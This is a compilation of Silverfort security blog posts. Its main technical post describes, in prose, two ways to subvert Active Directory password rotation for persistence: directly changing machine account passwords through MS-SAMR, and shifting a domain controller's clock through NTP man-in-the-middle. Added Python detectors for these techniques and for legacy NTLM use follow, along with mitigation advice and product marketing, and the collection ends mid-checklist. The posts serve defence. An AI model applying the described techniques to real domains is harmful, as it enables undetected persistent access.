**Every identity requires the right level of privilege controls, not the IAM fallacy:** While some vendors still try to stitch together IAM, IGA, and PAM and label it “identity security,” the market gradually realized that identity security requires a more modern approach, and that it’s very different from identity infrastructure. Identity security focuses on protecting identities from compromise, while identity infrastructure (or “IAM”) focuses on managing those identities and their lifecycle. Just like we no longer view cloud security as just a feature of the cloud infrastructure, or endpoint security as a feature of the endpoint itself, it’s becoming clear that identity security must be decoupled from the different silos of the IAM infrastructure to become truly effective. I explain this concept in-depth in a recent interview.

### Identity security – the next frontier

It’s exciting to witness CyberArk, the company that pioneered the PAM category and played a big role in creating what is now the Identity Security market, get to such an impressive scale. I deeply respect what Udi, Matt and their team have built, and how they helped push the market forward. This acquisition makes it evident that identity security is finally taking the center stage, and there’s no slowing down. The more I speak with customers, the more it’s clear to me that identity security has become the top cybersecurity concern (alongside AI security, and those two are very connected). Now is the time to shift from siloed sub-categories and point solutions like PAM, ITDR, ISPM, NHI, MFA, and IGA to adopting true “Identity Security.” It’s also time for Identity Security to fully decouple from the Identity Infrastructure and become a standalone layer that protects all the different Identity Infrastructure silos with a unified control plane.
I am hopeful that Palo Alto Networks will help move the market in this direction and go beyond the traditional PAM market, to join us and others in creating a true Identity Security category and help customers address this critical need end to end. After seeing the exact same evolution in all the other major categories of cybersecurity (endpoint, network, cloud, data, etc.), it’s time for Identity Security to evolve as well and stop lagging. At Silverfort, we’re proud to be leading this revolution and building the next-generation identity security platform, which is already trusted by more than 1,000 enterprises including many of the Global Fortune 100. We look at CyberArk’s journey as an inspiration as we continue our own and are excited to see where identity security will go from here!

See what our customers have to say about the power of modern identity security.

---

- Published: 2025-08-04
- Modified: 2025-08-01
- URL: https://www.silverfort.com/blog/service-accounts-from-security-measure-to-silent-foothold/

Microsoft’s built-in password rotation mechanism is designed to protect on-premises Non-Human Identities (NHIs), such as machine accounts in Active Directory (AD). On the surface, it appears to be a strong defense—automated, scheduled, and structured to minimize security risks. This safeguard, however, can be subverted—allowing attackers to create a persistent foothold. An adversary can manipulate the rotation process across an entire environment or a specific machine account through a Man-in-the-Middle (MITM) attack. Attackers may also bypass the process entirely by compromising machine account passwords and changing them directly, thereby hijacking the rotation mechanism without interfering with network traffic. By either manipulating time synchronization or directly modifying passwords, attackers can disrupt or take control of the password rotation process.
Time manipulation prevents scheduled rotations, while direct modification grants control over specific accounts—both enabling long-term persistence and evading detection.

### Security controls of on-premises NHIs

Service accounts are non-human identities used to run applications, services, and automated tasks in an on-prem AD environment. These accounts often use static passwords that never change, posing significant security risks. Once compromised, attackers can use these credentials for:

- **Theft & Lateral Movement:** Utilizing the account's privileges to move laterally.
- **Privilege Escalation:** Gaining administrative access through elevated privileges.
- **Long-Term Persistence:** Maintaining access without detection or expiration.

To mitigate such risks, password rotation ensures that account credentials change periodically. There are two primary types of accounts implementing password rotation:

- **Machine Accounts:** Represent domain-joined computers; password changes are managed by the local operating system.
- **Managed Service Accounts (MSAs):** Designed for services and applications; password rotation is enforced by the Domain Controller (DC).

| Account type | Purpose | Who manages rotation? |
| --- | --- | --- |
| Machine accounts | Computer authentication within the domain | Local operating system |
| Standalone MSAs | Single-server application authentication | Domain Controller (DC) |
| Group MSAs (gMSAs) | Shared across multiple machines | Domain Controller (DC) |
| Delegated MSAs | Extension of gMSAs with delegated admin control | Domain Controller (DC) |

Understanding these differences is critical, as attackers exploit rotation mechanisms differently per account type. For instance, machine accounts can be hijacked via RPC methods such as MS-SAMR, while MSAs require manipulation of the DC rotation process.

### Attack vector 1: Disabling machine account password rotation

In Active Directory, machine account password rotation is the responsibility of the client system, typically a domain-joined Windows host.
The local operating system automatically rotates its machine account password every 30 days by default. To do so, it remotely communicates with the Domain Controller (DC) using the Security Account Manager Remote Protocol (MS-SAMR) over RPC. This protocol provides a set of administrative operations for managing user and computer accounts in Active Directory. One of the key functions used by the client to perform remote password updates is hSamrUnicodeChangePasswordUser2, which enables the authenticated client to change the password associated with its machine account in the directory.

*Figure: Machine account password rotation*

#### Mechanics of the attack

However, this mechanism can be hijacked. Once an attacker gains access to the machine account, they can use MS-SAMR and specifically invoke hSamrUnicodeChangePasswordUser2 to directly modify the account password in Active Directory, without notifying or involving the original client. This severs the synchronization between the domain-joined machine and the DC, resulting in a one-sided trust relationship where the attacker controls the credentials and the legitimate host is locked out.

*Figure: Mechanics of the attack*

This breaks the trust between the machine and the DC. Each stores a copy of the password, and an unauthorized modification leads to a mismatch. The AD object remains valid indefinitely, ensuring persistent access.

*Figure: Machine account disabling password rotation*

Once rotation is disabled, the account remains valid, even though no further password changes occur. The broken trust leaves the compromised machine unusable.

### Manipulating password rotation with time attacks

To improve service credential security, Microsoft introduced standalone MSAs in Windows Server 2008 R2. MSAs rely on the DC for password management, but this centralization introduces new attack vectors. By manipulating system time on either the DC or service host, attackers can delay scheduled password changes.
Since AD relies on timestamps, rolling the clock backwards postpones rotation and maintains access.

#### How time affects password rotation

Active Directory uses the PwdLastSet attribute to determine when an account's credentials were last rotated. This timestamp is critical for enforcing password expiration policies. Accurate time synchronization is vital for AD operations, including password policies and Kerberos authentication.

#### The role of NTP in time synchronization

Enterprises typically rely on external NTP for time accuracy. Windows uses NTP version 3 by default, which lacks message integrity protections.

#### Windows time synchronization (w32tm) overview

The Windows Time Service (w32tm) synchronizes domain time. In this case, the Domain Controller has two roles:

- Acts as a time server, distributing time to domain members.
- Syncs with external NTP servers as a time client.

Key security parameters include:

- **MaxPosPhaseCorrection and MaxAllowedPhaseOffset:** Max time adjustments allowed per sync.
- **Secure Time Seeding (STS):** Uses TLS timestamps for tampering detection but is limited, especially post-TLS 1.3.

#### Disrupting password rotation via domain time manipulation

MITM attacks between the DC and NTP source can gradually shift the DC’s time without detection. w32tm allows up to 48 hours of correction per sync, updated every 64 seconds.

### Attack vector 2: Time manipulation of MSA password rotation

The attacker first manipulates the DC’s clock and then triggers password rotation through one of the following methods:

- **Direct Request:** A user or a service with privileges over the Managed Service Account.
- **Natural Trigger:** Allowing the Managed Service Account to reauthenticate naturally.

When credentials are rotated while the system time is artificially set ahead, the PwdLastSet reflects that future timestamp. Reverting the clock back effectively delays the next scheduled rotation, bypassing enforcement.
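Both attack vectors above leave traces a defender can look for: a PwdLastSet that sits in the future (rotation performed under a clock set ahead), a machine account that keeps authenticating although its password has not changed within the expected interval (the client-side rotation was severed), and a large system time change on the DC shortly followed by a computer-account change. The following is an added, defender-side example and not Silverfort's code: it implements those checks over a constructed directory snapshot and constructed Security events (4616, system time changed; 4742, computer account changed), the two event IDs this post recommends monitoring. The 30-day interval is the default the post states; the grace period, the time-jump threshold and the correlation window are assumptions chosen for the example.

```python
"""Added example (not Silverfort's code): PwdLastSet and 4616/4742 checks for the
password-rotation tampering described in the post. All accounts, hosts and events
below are constructed sample data, not real directory or log content."""
from datetime import datetime, timedelta, timezone

WINDOWS_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)
MACHINE_ROTATION_DAYS = 30                   # default machine account interval stated in the post
GRACE_DAYS = 7                               # assumption: slack before a missed rotation is reported
TIME_JUMP_THRESHOLD = timedelta(minutes=5)   # assumption: 4616 deltas above this deserve a look
CORRELATION_WINDOW = timedelta(hours=24)     # assumption: a 4742 this soon after a big jump is suspicious
NOW = datetime(2025, 7, 30, 12, 0, tzinfo=timezone.utc)  # constructed "current time" for the snapshot


def filetime_to_datetime(ft: int) -> datetime:
    """pwdLastSet is stored as a FILETIME: 100 ns ticks since 1601-01-01 UTC."""
    return WINDOWS_EPOCH + timedelta(microseconds=ft // 10)


def datetime_to_filetime(dt: datetime) -> int:
    d = dt - WINDOWS_EPOCH
    return (d.days * 86_400 + d.seconds) * 10_000_000 + d.microseconds * 10


# Constructed directory snapshot: sAMAccountName, objectClass, pwdLastSet, lastLogonTimestamp.
SNAPSHOT = [
    {"sam": "WS01$", "cls": "computer",
     "pwdLastSet": datetime_to_filetime(NOW - timedelta(days=12)),
     "lastLogon": datetime_to_filetime(NOW - timedelta(hours=1))},   # healthy: rotated 12 days ago
    {"sam": "FS02$", "cls": "computer",
     "pwdLastSet": datetime_to_filetime(NOW + timedelta(days=20)),
     "lastLogon": datetime_to_filetime(NOW - timedelta(hours=3))},   # rotated while the clock was set ahead
    {"sam": "SP01$", "cls": "computer",
     "pwdLastSet": datetime_to_filetime(NOW - timedelta(days=75)),
     "lastLogon": datetime_to_filetime(NOW - timedelta(hours=2))},   # still authenticating, no rotation for 75 days
    {"sam": "OLD03$", "cls": "computer",
     "pwdLastSet": datetime_to_filetime(NOW - timedelta(days=200)),
     "lastLogon": datetime_to_filetime(NOW - timedelta(days=190))},  # dormant host: hygiene issue, not a hijack signal
]


def pwd_last_set_findings(snapshot, now=NOW):
    """Flag a PwdLastSet in the future (rotation under a manipulated clock) and a machine
    account that keeps logging on without rotating inside the expected interval."""
    findings = []
    for obj in snapshot:
        pls = filetime_to_datetime(obj["pwdLastSet"])
        last_logon = filetime_to_datetime(obj["lastLogon"])
        if pls > now + TIME_JUMP_THRESHOLD:
            findings.append((obj["sam"], "pwdLastSet_in_future"))
            continue
        if obj["cls"] == "computer":
            overdue = now - pls > timedelta(days=MACHINE_ROTATION_DAYS + GRACE_DAYS)
            active = now - last_logon <= timedelta(days=GRACE_DAYS)
            if overdue and active:
                findings.append((obj["sam"], "rotation_stalled_but_active"))
    return findings


# Constructed Security-log events from the DC. 4616 carries Previous Time / New Time;
# 4742 carries the computer account that was changed.
EVENTS = [
    {"id": 4616, "host": "DC01", "time": NOW - timedelta(days=3, hours=2),
     "previous": NOW - timedelta(days=3, hours=2),
     "new": NOW - timedelta(days=3, hours=2) + timedelta(seconds=1)},        # routine 1 s correction
    {"id": 4616, "host": "DC01", "time": NOW - timedelta(days=1, hours=3),
     "previous": NOW - timedelta(days=1, hours=3),
     "new": NOW - timedelta(days=1, hours=3) + timedelta(hours=30)},         # 30 h forward jump
    {"id": 4742, "host": "DC01", "time": NOW - timedelta(days=1, hours=2), "target": "FS02$"},  # changed 1 h later
    {"id": 4742, "host": "DC01", "time": NOW - timedelta(days=10), "target": "WS01$"},          # routine rotation
]


def time_change_correlations(events, window=CORRELATION_WINDOW, threshold=TIME_JUMP_THRESHOLD):
    """Pair each large clock change (4616) with computer-account changes (4742) on the
    same host inside the window. Returns (account, clock delta) tuples."""
    jumps = [e for e in events if e["id"] == 4616 and abs(e["new"] - e["previous"]) > threshold]
    hits = []
    for j in jumps:
        for e in events:
            if e["id"] != 4742 or e["host"] != j["host"]:
                continue
            if timedelta(0) <= e["time"] - j["time"] <= window:
                hits.append((e["target"], j["new"] - j["previous"]))
    return hits


if __name__ == "__main__":
    for sam, reason in pwd_last_set_findings(SNAPSHOT):
        print(f"{sam}: {reason}")
    for target, delta in time_change_correlations(EVENTS):
        print(f"{target}: changed within {CORRELATION_WINDOW} of a {delta} clock jump")
```

Run on the constructed data, the snapshot check reports FS02$ (future timestamp) and SP01$ (active but not rotating), while OLD03$ is left to a dormancy review, and the event correlation ties the 30-hour clock jump to the FS02$ change. In a real deployment the snapshot would come from an LDAP query for `pwdLastSet` and `lastLogonTimestamp` and the events from the DCs' Security logs; the thresholds should be tuned to the domain's actual rotation policy.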
#### Key advantage

All domain members synchronize with the DC, maintaining Kerberos authentication and minimizing detection. This synchronization masks the time manipulation from endpoint systems, ensuring stealth and continuity of service.

#### Consequences of the attack

These attacks can lead to long-term persistence within the environment by bypassing expiration controls via timestamp manipulation. Once an attacker rotates credentials with an altered time setting, subsequent rollbacks prevent further rotations, effectively nullifying security enforcement. The compromised account continues to function with a valid token, undetected. In addition to persistence, such time-based manipulation allows for evasion of password policies and potential privilege escalation. The rollback of system clocks may also lead to intermittent service failures and authentication issues, creating operational disruption and making detection more difficult.

### Mitigation strategies

Organizations should implement secure time synchronization using authenticated NTP protocols such as NTPv4, which supports message integrity and authentication. Monitoring critical event logs can also help detect unusual behavior: Event ID 4616 (indicating time changes) and Event ID 4742 (indicating password changes for computer accounts) are particularly relevant. Additionally, implement monitoring for abnormal PwdLastSet patterns across service and machine accounts. These indicators can reveal attempts to manipulate rotation schedules or maintain stealth access. With these measures in place, the risk of stealthy, time-based attacks can be significantly reduced.

---

- Published: 2025-07-31
- Modified: 2025-07-30
- URL: https://www.silverfort.com/blog/introducing-the-silverfort-mcp-server-where-ai-agents-meet-identity-security/

### The future of identity-aware AI starts now

AI agents are becoming integral to enterprise workflows, from analyzing risk to making dynamic access decisions in real time.
But as these agents evolve, so must the systems they interact with. At Silverfort, we’ve taken a bold step forward in enabling secure, intelligent, and scalable identity integration with AI: introducing the Silverfort MCP Server.

MCP (Model Context Protocol) is a new open protocol that empowers AI systems to discover and interact with enterprise tools through standard interfaces. Originally developed by Anthropic, MCP is now becoming the de facto interface for AI agent integrations. With the launch of our own Silverfort-hosted MCP server, agents can now directly tap into the power of the Silverfort Identity Security Platform in real time, in a secure and contextual way.

### What is MCP and why it matters

MCP enables AI agents to connect with external systems like databases, APIs, and services using a structured and standardized protocol. Rather than relying on brittle, hard-coded integrations, MCP allows for dynamic tool discovery, schema introspection, and natural language querying of live data. This makes AI agents more adaptable and maintainable, as well as easier to scale across diverse environments.

With MCP, AI agents like Claude, GitHub Copilot, and Cursor can access systems with context-aware intelligence. They are no longer guessing—they are asking, understanding, and acting.

#### Why it matters

MCP represents a fundamental shift in how AI systems interface with enterprise infrastructure. Until now, connecting an AI model to business systems required complex engineering work, custom code, and frequent updates as systems changed. MCP replaces that with a universal, language-model-friendly interface, removing friction from integration and accelerating deployment.

This shift unlocks a wide range of possibilities:

- **Increased Autonomy:** Agents can independently explore available tools, understand their capabilities, and determine how to use them effectively without manual intervention.
- **Reduced Integration Overhead:** Engineering teams no longer need to build and maintain interfaces for every AI tool. A single MCP-compliant layer can serve many agents.
- **More Intelligent Behavior:** With structured access to real-time data and operations, agents can reason more accurately, make better decisions, and perform complex workflows safely.
- **Faster Innovation Cycles:** As tools evolve or new systems are introduced, MCP enables plug-and-play compatibility, making it easier to experiment and iterate.

### Meet the Silverfort MCP Server

To bring the power of MCP to enterprise identity security, we’ve launched the Silverfort MCP Server, hosted at https://raven.silverfort.io/mcp. We are one of the first identity security companies to embrace this new protocol, arming our customers with the tools they need to be efficient, yet secure. This provides a direct and secure conduit for AI agents to interact with Silverfort’s core capabilities, including:

**Natural Language Policy Management**

- List, retrieve, update, and delete security policies
- Execute advanced policy filtering and searches
- Create dynamic workflows with AI copilots for policy changes

**Intelligent Risk Assessment**

- Get detailed risk profiles for users, devices, and resources
- Add or modify risk indicators with expiration and descriptions
- Use conversational prompts to drive targeted risk investigations

#### Streamable HTTP Architecture

Under the hood, the Silverfort MCP Server is built on Streamable HTTP, the latest and most robust MCP transport protocol. This allows for remote, concurrent, and stateless communication between your AI agents and the Silverfort cloud. It is also optimized for reliability and scalability.

You do not need to deploy, configure, or host anything yourself. The Silverfort MCP Server runs entirely in the cloud, making it immediately accessible to authorized clients like Claude Desktop, GitHub Copilot, and any other tools supporting the MCP client pattern.
While many other MCP implementations require you to clone repositories, spin up local servers, and wrestle with tunneling or NAT traversal to get started, Silverfort eliminates all of that. Our hosted MCP endpoint is available out of the box, with no setup gymnastics required.

*Figure: How the Silverfort MCP Server works*

### Secure by design: Built on Silverfort's Identity Security Platform

Security is non-negotiable when it comes to giving AI agents access to enterprise resources. That is why we recently announced Silverfort Security for AI, a groundbreaking capability designed to govern and protect AI agents with the same rigor applied to human identities. In an upcoming release of the Silverfort MCP Server, organizations will be able to secure AI agents that interact with the MCP interface using Silverfort’s Security for AI framework. This will allow you to define which agents are permitted to access which tools, when, and under what conditions, bringing visibility and control to AI-powered access.

With Silverfort Security for AI, every action an AI agent takes through MCP will be:

- Tied to a human owner for full accountability
- Evaluated with least-privilege policies in real time
- Logged immutably to ensure a verifiable audit trail
- Governed by dynamic access controls that prevent misuse, overreach, or privilege escalation

By securing AI agents at the protocol layer, Silverfort empowers security teams to embrace AI without compromise.

### A glimpse into the future

While today’s MCP capabilities focus on Silverfort policy and risk operations, this is only the beginning. We plan to deepen the context available to AI agents and expand their tools. Think of the MCP interface as a browser for your AI agent, complete with its own plugins, environment, and permissions. As MCP adoption matures, we intend to let users enrich their agent’s context in increasingly intelligent and task-aware ways.
Imagine an agent that can:

- Search and filter policies based on natural language queries rather than IDs or tags
- Correlate policy configurations with live threat intelligence or recent auth activity
- Use system prompts and tool schemas to analyze logs and highlight risky behaviors automatically

We aim to create a more fluid, expressive interface between AI agents and the identity fabric of the enterprise, one that feels as natural to use as asking a colleague for help.

### Getting started with Silverfort's MCP Server

Setting up your connection to the Silverfort MCP server is easy:

- Install Claude Desktop or your preferred MCP-compatible client
- Configure it to connect to https://raven.silverfort.io/mcp
- Provide API credentials with appropriate Policy Management and Risk Assessment permissions
- Ask questions like:
  - “What are the high-risk Silverfort policies active in my environment?”
  - “Update policy pol_5678 to require MFA”
  - “Check the risk score for user cfo@company.com”

In minutes, your AI agents can begin securely reasoning over live identity data.

### A secure future for AI Agents

AI is reshaping enterprise architecture, and identity is at the core of that transformation. The Silverfort MCP Server brings secure AI access to the heart of identity security, enabling safer innovation and faster decision-making. Start building your AI-augmented identity workflow today.

For questions or to request a demo, contact us at ecosystem@silverfort.com.
---

- Published: 2025-07-31
- Modified: 2025-08-01
- URL: https://www.silverfort.com/blog/how-to-mitigate-active-exploitation-of-microsoft-sharepoint-vulnerabilities/

A recent Microsoft security blog post highlights active exploitation of on-premises SharePoint vulnerabilities, where attackers are:

- Stealing credentials via SharePoint exploits
- Moving laterally using legacy protocols (NTLM, SMB)
- Abusing service accounts to escalate privileges
- Pivoting from on-prem to hybrid environments

Patching isn’t always immediate—so how do Silverfort customers mitigate risk without waiting for updates? Silverfort’s identity-centric security platform provides a multilayered defense. In this blog post, we’ll explain how customers can protect their environment in five steps.

### 5 ways Silverfort protects against exploited SharePoint vulnerabilities

#### Prevent lateral movement via legacy protocols

Attackers use stolen credentials to move laterally via NTLM, SMB, RDP, PsExec—protocols where traditional MFA fails.

Silverfort’s Solution:

- Enforces MFA and access policies for legacy authentication
- Blocks stolen credentials from authenticating to file shares, databases, and domain controllers

*Figure: MFA policy configuration*

#### Agentless protection for unpatchable systems

Many SharePoint servers can’t tolerate agents or immediate patching.

Silverfort’s Solution:

- No agents required—integrates at the domain controller level
- Provides real-time visibility and enforcement without server-side changes

#### Conditional access for on-prem identities

Attackers abuse on-prem AD accounts to pivot into hybrid environments.

Silverfort’s Solution:

- Extends Microsoft Entra ID-like Conditional Access to on-prem AD
- Blocks or requires MFA based on risk, location, time, or authentication method

*Figure: Access policy in Silverfort*

#### Service account protection

SharePoint relies on privileged service accounts, which attackers target.

Silverfort’s Solution:

- Detects anomalous service account usage (e.g., logins from new hosts)
- Enforces risk-based MFA for service accounts

*Figure: Gaining visibility into on-prem service accounts using the Silverfort Identity Security Platform*

#### Instant incident containment

Microsoft warns of real-time exploitation—requiring rapid response.

Silverfort’s Solution:

- Blocks compromised accounts instantly across all AD-dependent systems
- Enforces quarantine policies without system modifications

*Figure: View incidents by type, severity, and other filters*

### Silverfort vs. SharePoint exploitation: Key use cases

| Threat Vector | Silverfort's Mitigation |
| --- | --- |
| Lateral movement (NTLM, SMB) | MFA and access policies for legacy protocols |
| Service account abuse | Anomaly detection plus risk-based MFA enforcement |
| On-prem identity misuse | Conditional access for AD |
| Agentless defense needed | DC-level enforcement, no server agents required |
| Rapid exploit containment | Real-time blocking at the authentication layer |

### Next steps for at-risk organizations

- Audit SharePoint-related service accounts and admin logins.
- Apply risk-based policies for legacy protocols and sensitive accounts.
- Isolate compromised identities with zero trust enforcement.
- Leverage agentless protection to reduce blast radius—even before patching.

### Specific action plan

**Immediate (First 24 hours):**

- Identify all SharePoint servers and dependent systems
- Disable unnecessary legacy protocols (NTLMv1, WDigest)
- Enable Silverfort monitoring for SharePoint-related accounts

**Short-Term (First week):**

- Implement MFA for all privileged SharePoint accounts
- Restrict service account permissions
- Configure geo-fencing for administrative access

**Ongoing:**

- Conduct regular access reviews
- Test incident response playbooks
- Monitor for new IOCs related to SharePoint exploits

If your team uses Microsoft SharePoint and would like to learn more about how the capabilities mentioned in this post can protect your organization, request a demo today.
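Two items in the action plan above, disabling NTLMv1 and auditing SharePoint-related service account logins, are easier to act on when you can see which accounts still authenticate with legacy packages and to which hosts. The following is an added example, not Silverfort's code: a small parser for the message body of Windows Security event 4624 (successful logon) that flags NTLMv1/LM use anywhere and NTLM of any version on hosts that should only see Kerberos. The events are constructed samples built in the layout the Security log uses, and the set of "sensitive" hosts (the SharePoint server and a DC) is an assumption for the example.

```python
"""Added example (not Silverfort's code): flag legacy NTLM authentication from the
message bodies of Security event 4624. All events below are constructed samples."""
from collections import Counter

LEGACY_PACKAGES = {"NTLM V1", "LM"}   # "Package Name (NTLM only)" values meaning NTLMv1-era auth


def parse_4624(message: str) -> dict:
    """Flatten a 4624 message into a dict. Keys that repeat across sections
    (Account Name under Subject and under New Logon) are also stored as
    'Section.Key'; the plain key keeps the last value seen."""
    fields, section = {}, ""
    for raw in message.splitlines():
        line = raw.strip()
        if not line:
            continue
        key, sep, value = line.partition(":")   # first colon only, so IPv6 values survive
        key, value = key.strip(), value.strip()
        if not sep or not value:                # bare header such as "New Logon:"
            section = key
            continue
        fields[key] = value
        if section:
            fields[f"{section}.{key}"] = value
    return fields


def legacy_auth_findings(events, sensitive_hosts=frozenset()):
    """events: iterable of {"computer": host that logged the event, "message": 4624 text}.
    One finding per event that used NTLMv1/LM anywhere, or NTLM of any version on a
    host listed in sensitive_hosts."""
    findings = []
    for ev in events:
        f = parse_4624(ev["message"])
        account = f"{f.get('New Logon.Account Domain', '')}\\{f.get('New Logon.Account Name', '?')}"
        package = f.get("Authentication Package", "-")
        ntlm_version = f.get("Package Name (NTLM only)", "-")
        base = {"account": account, "host": ev["computer"],
                "source": f.get("Source Network Address", "-"),
                "logon_type": f.get("Logon Type", "-")}
        if ntlm_version in LEGACY_PACKAGES:
            findings.append({**base, "severity": "high", "reason": f"{ntlm_version} authentication"})
        elif package == "NTLM" and ev["computer"] in sensitive_hosts:
            findings.append({**base, "severity": "medium", "reason": "NTLM logon to sensitive host"})
    return findings


def summarize(findings) -> Counter:
    """Count findings per account so the noisiest accounts surface first."""
    return Counter(f["account"] for f in findings)


def _event(computer, account, domain, logon_type, process, package, ntlm_version, source):
    """Build a constructed 4624 message body (same field layout as the Security log)."""
    message = (
        "An account was successfully logged on.\n\n"
        "Subject:\n\tSecurity ID:\t\tS-1-0-0\n\tAccount Name:\t\t-\n\tAccount Domain:\t\t-\n\n"
        f"Logon Type:\t\t\t{logon_type}\n\n"
        f"New Logon:\n\tSecurity ID:\t\tS-1-5-21-1-2-3-1001\n\tAccount Name:\t\t{account}\n"
        f"\tAccount Domain:\t\t{domain}\n\n"
        f"Network Information:\n\tWorkstation Name:\t{computer}\n\tSource Network Address:\t{source}\n\n"
        f"Detailed Authentication Information:\n\tLogon Process:\t\t{process}\n"
        f"\tAuthentication Package:\t{package}\n\tTransited Services:\t-\n"
        f"\tPackage Name (NTLM only):\t{ntlm_version}\n\tKey Length:\t\t128\n"
    )
    return {"computer": computer, "message": message}


# Constructed sample events (not captured logs).
SAMPLE_EVENTS = [
    _event("SP01", "svc_sharepoint", "CORP", 3, "NtLmSsp", "NTLM", "NTLM V1", "10.0.0.5"),
    _event("SP01", "jdoe", "CORP", 3, "Kerberos", "Kerberos", "-", "10.0.0.20"),
    _event("DC01", "adm-backup", "CORP", 3, "NtLmSsp", "NTLM", "NTLM V2", "10.0.0.5"),
    _event("WS07", "svc_sql", "CORP", 3, "NtLmSsp", "NTLM", "NTLM V2", "10.0.0.9"),
]
SENSITIVE_HOSTS = {"SP01", "DC01"}   # assumption: these should only see Kerberos logons


if __name__ == "__main__":
    for f in legacy_auth_findings(SAMPLE_EVENTS, SENSITIVE_HOSTS):
        print(f"[{f['severity']}] {f['account']} -> {f['host']} from {f['source']}: {f['reason']}")
```

On the constructed sample the service account's NTLMv1 logon to the SharePoint server is reported as high and the NTLMv2 logon to the DC as medium; the Kerberos logon and the NTLMv2 logon to an ordinary workstation produce nothing. The high-severity list is the set of accounts and hosts that will break when NTLMv1 is disabled, which is exactly what to review before flipping that setting.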
---

- Published: 2025-07-30
- Modified: 2025-07-30
- URL: https://www.silverfort.com/blog/six-capabilities-every-identity-security-platform-must-have/

Identity has changed – in a world where business occurs across systems, time zones, and even between humans and non-humans, “identity” no longer means a single person logging into a single device in a single location. So why are we still approaching identity security as if it’s 2005? There must be a better way: a way that doesn’t consider a disjointed set of IAM, IGA, and PAM solutions the only option, but also considers where visibility, posture, protection, and threat analysis come into play. This is where identity security sits – going beyond authorization and access management and entering the realm of real-time prevention, detection, and response.

According to research from the Securing the Identity Attack Surface report, “75% of detections are malware-free (a malware-free attack enables adversaries to operate under the radar and navigate seamlessly across endpoint and cloud domains).” So yes, that saying “Attackers aren’t breaking in, they’re logging in” is true now more than ever, and there’s no turning back. Yet, while identity management doesn’t equate to identity security, IAM, compliance, and security teams are still in the position of needing to solve the same problems as back when “securing” identities meant governing access for one person, one device, one location.
These unchanging challenges include solving how to:

- Gain visibility into all identities, everywhere
- Decrease operational and systems complexity
- Improve processes and communication
- Reduce the likelihood of security incidents (or at least contain them when they do occur)

This is why we’ve created the industry’s first Identity Security RFP checklist, a resource designed for identity, compliance, and security teams to evaluate vendors across six focus areas so they can ask the right questions that lead to selecting comprehensive, best-of-breed solutions. In this blog, we’ll loosely touch on these six core capabilities every identity security solution should have that, when satisfied, set up your organization for success regardless of environment, company size, or industry. To jump to the full Identity Security RFP Checklist, click here.

### Capability #1: Enable universal Multi-factor Authentication (MFA)

Most MFA solutions weren’t designed to cover everything – leaving behind a trail of unprotected systems, legacy protocols, and unmanaged interfaces. To add further complication, even where MFA is deployed, implementation is often complex – requiring agents or proxies – and managing multiple MFA tools across on-prem and cloud leads to redundant costs and inconsistent user experience. What organizations really need is universal MFA: the ability to extend protection to any resource, without modifying servers or applications, and without being locked to a single MFA provider. To get to the root of whether a solution provider offers universal MFA, key questions to ask include:

- Does your solution extend MFA for systems that are more challenging, i.e., command-line tools like PsExec to IT/OT infrastructure and custom apps?
- Does your solution eliminate the need for agents or proxies with real-time or inline enforcement?
- Can your solution provide MFA for all AD authentications, including NTLM, Kerberos, LDAP and LDAPS?
- Does your solution extend Entra ID conditional access to AD-managed resources?
- Does your solution integrate with Okta MFA?

*Figure: Universal MFA from Silverfort*

### Capability #2: Enforce least privilege access

Once an attacker gains a foothold in systems, there’s often no way to stop lateral movement or privilege escalation without impacting core systems. Worse yet, most detection tools trigger only after the damage is done. What’s needed is inline enforcement at the point of authentication – deep within the identity infrastructure – so access can be blocked or challenged before a session is ever established. You need to be able to inspect every login attempt and continuously assess risk to enforce policy before a session ever begins. To get to the root of whether a solution provider enables your team to enforce least privilege access, key questions to ask include:

- Does your solution have runtime access protection, offering preemptive, inline security controls at the authentication layer?
- Can your solution prevent lateral movement and ransomware propagation as it’s happening?
- Can your solution prevent PAM bypass by admins that log in directly to resources?

*Figure: Authentication Firewall from Silverfort*

### Capability #3: Protect privileged users and accounts

Privileged accounts continue to be one of the most abused entry points in breaches and insider threats. As Chief Identity Security Advisor (EMEA) Rob Ainscough notes in his webinar “Winning the Privileged Access Battle: From Firefighting to Field Control,” security teams typically turn to Privileged Access Management (PAM) solutions to prevent privileged account abuse. However, PAM solutions are difficult to scale, struggle to provide comprehensive coverage (especially where non-human identities such as service accounts are concerned), and can take months or years just to protect a single account.
*Figure: Implementing PAM solutions takes away time and resources, yet still doesn’t provide comprehensive protection for all privileged accounts*

What organizations need is an approach that reduces overhead, eliminates blind spots, and enforces least privilege dynamically. To get to the root of whether a solution provider protects privileged users and accounts, key questions to ask include:

- Can your solution discover unknown privileged accounts?
- Can your solution enforce least privilege access by restricting where accounts can be used through virtual fencing?
- How does your solution prevent abuse of privileged accounts without disrupting legitimate workflows?

*Figure: Privileged Access Security from Silverfort*

### Capability #4: Discover, classify, and secure non-human identities such as service accounts

Non-human identities (NHIs) like service accounts and API keys outnumber human users by at least 50:1, and this divide continues to grow. Yet these identities often operate in the shadows. They’re difficult to discover, lack clear ownership, and are frequently granted excessive privileges. Modern identity security solutions need to provide complete visibility, active control, and scalable automation to manage NHIs at scale throughout their entire lifecycle – whether in the cloud or on-prem. To get to the root of whether a solution provider secures every NHI across cloud and on-prem, key questions to ask include:

- Can your solution automatically discover and classify the following types of NHIs or programmable access credentials?
  - On-premises AD Service Accounts
  - OAuth or Access Tokens
  - API Keys
  - Certificates
  - Cloud IAM Roles
  - Service Principals
  - Cryptographic Keys
- Can your solution view every authentication request that goes across Active Directory?
- Does your solution automate protection of machine identities at scale using APIs, smart policy engines, and integrations such as CMDB or ticketing systems?
- Can your solution provide identification and inventory of service accounts?
- Can your solution facilitate the onboarding of service accounts to PAM?

*Figure: NHI Security from Silverfort*

### Capability #5: Detect and block credential abuse, stop lateral movement, reduce false positives, and activate real-time response

According to the 2024 Verizon Data Breach Investigations Report, over 80% of breaches involve stolen or compromised credentials. Yet most detection and response tools weren’t built with identity in mind. Additionally, with traditional SIEM platforms it’s difficult to scale detections centered around identity, making it hard for SOC and IR teams to keep pace with evolving threats. Meanwhile, EDRs, XDRs, and CDRs only look at one piece of the puzzle, rather than offering a full picture of threats in the environment. To close those gaps, organizations need ITDR solutions that are identity-native and proactive. The right platform can identify threats at the heart of many large-scale breaches: lateral movement, privilege escalation, and suspicious access patterns. To get to the root of whether a solution provider can detect and respond to identity-driven threats in real time, key questions to ask include:

- Does your solution deliver advanced identity-aware threat detection that inspects every access attempt across on-prem and cloud resources?
- Can your solution go beyond passive detection to enable inline, real-time responses to malicious behavior?
